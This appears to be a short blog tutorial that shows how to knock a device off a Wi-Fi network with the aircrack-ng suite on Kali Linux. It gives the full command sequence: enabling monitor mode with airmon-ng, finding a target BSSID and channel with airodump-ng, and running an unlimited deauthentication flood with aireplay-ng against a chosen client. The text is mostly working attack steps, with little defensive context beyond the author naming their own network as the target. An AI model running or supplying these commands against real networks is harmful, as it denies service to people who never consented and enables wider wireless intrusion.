Wireless DOS Attack

Aircrack-ng

Aircrack-ng is a built in tool available in Kali Linux. It has the capability of performing wireless attacks. In this tutorial we will know how to perform a DOS attack on Wi-Fi.

Note- This attack is only possible if your Kali running on the system itself. Virtual Machine or Virtual Box will not work as it requires hardware access.

Firstly fire up Kali and run the terminal.

#ifconfig

Note down the name of the wireless adapter.
screenshot from 2019-01-13 07-53-08
Now
#airmon-ng start wlan0 //Name of the adapter give here.

This command will change the name of your adapter 
(It may or may not change check the output of the command to know).

#airodump-ng wlan0mon 

screenshot from 2019-01-13 07-53-58

Here i am targeting my wifi Dirty.inc with bssid as - 2C:30:33:...
Isolate your target using the channel number and bssid.
Stop the above command by CTRL+C and then,


#airodump-ng -c 13 --bssid 2C:30:33:... wlan0mon

(Here give your wi-fi target bssid and channel number )

screenshot from 2019-01-13 07-55-41

Now I will target device connected which has the bssid 18:D7:17:...

Let the above command run.
Open a new tab,

#aireplay-ng --deauth 0 -a 2C:30:33:... -c 18:D7:17:... wlan0mon
screenshot from 2019-01-13 07-56-48

Here in option -a give your router bssid and -c give your target device bssid
which needs to be kicked out or Denial Of Service is to be performed.
Once this command is run the device will be kicked off wifi and will not
have wifi connection till you stop this command.

For knowing how aircrack-ng works and more information please visit,

Aircrack-ng

Leave a comment